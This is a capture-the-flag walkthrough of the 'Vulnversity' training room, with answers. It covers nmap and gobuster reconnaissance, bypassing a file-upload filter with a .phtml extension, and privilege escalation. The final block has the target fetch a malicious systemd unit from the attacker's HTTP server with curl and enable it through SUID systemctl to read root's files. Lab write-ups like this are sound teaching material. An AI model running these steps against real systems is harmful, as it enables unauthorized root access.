# Vulnversity

![alt logo](https://i.imgur.com/OvoIXQK.png)
- Name: Vulnversity
- Description: Learn about active recon, web app attacks and privilege escalation.

## Reconnaissance:

- There are many nmap "[cheatsheets](https://github.com/marsam/cheatsheets/blob/master/nmap/nmap.rst)" online that you can use too.
- Scan the box, how many ports are open?
  ```bash
  nmap -sC -sV [IP] > nmap_scan && cat nmap_scan | grep open | wc -l
  ```
  - Answer: 6.
- What version of the squid proxy is running on the machine?
  ```bash
  cat nmap_scan | grep "proxy"
  ```
  - Answer: 3.5.12.
- How many ports will nmap scan if the flag -p-400 was used?
  - Answer: 400.
- Using the nmap flag -n what will it not resolve?
  - Answer: dns.
- What is the most likely operating system this machine is running?
  ```
  22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
  3333/tcp open  http        Apache httpd 2.4.18 ((Ubuntu))
  ```
  - Answer: Ubuntu.
- What port is the web server running on?
  ```
  3333/tcp open  http        Apache httpd 2.4.18 ((Ubuntu))
  ```
  - Answer: 3333.

## Locating directories using GoBuster:
- What is the directory that has an upload form page?
  ```bash
  gobuster dir -u http://[IP]:3333/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
  ```
  ```
  ===============================================================
  Gobuster v3.0.1
  by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
  ===============================================================
  [+] Url:            http://[IP]:3333/
  [+] Threads:        10
  [+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
  [+] Status codes:   200,204,301,302,307,401,403
  [+] User Agent:     gobuster/3.0.1
  [+] Timeout:        10s
  ===============================================================
  2021/03/23 19:10:07 Starting gobuster
  ===============================================================
  /images (Status: 301)
  /css (Status: 301)
  /js (Status: 301)
  /fonts (Status: 301)
  /internal (Status: 301)
  /server-status (Status: 403)
  ===============================================================
  2021/03/23 19:10:25 Finished
  ===============================================================
  ```
  Answer: /internal/.

## Compromise the webserver:
- Try upload a few file types to the server, what common extension seems to be blocked?
  - Answer: .php
- Run this attack, what extension is allowed?
  ![alt screenshot](https://i.imgur.com/HwjY6ky.png)
  - Answer: .phtml
- What is the name of the user who manages the webserver?
  ```bash
  cd /home && ls
  ```
  - Answer: bill.
- What is the user flag?
  ```bash
  cd /home/bill && cat user.txt
  ```
  - Answer: *user.txt content*
## Privilege Escalation:
- On the system, search for all SUID files. What file stands out?
  ```bash
  find / -perm -u=s -type f 2>/dev/null
  ```
  - Answer: /bin/systemctl
- Become root and get the last flag (/root/root.txt)
  ```bash
  # On your own machine
  echo '[Service]
  Type=oneshot
  ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
  [Install]
  WantedBy=multi-user.target' > exploit
  python3 -m http.server 8081
  # On target machine
  TF=$(mktemp).service
  curl http://[YOUR_IP]:8081/exploit --output $TF
  /bin/systemctl link $TF
  /bin/systemctl enable --now $TF
  cat /tmp/output
  ```
  - Answer: *content of /tmp/output*
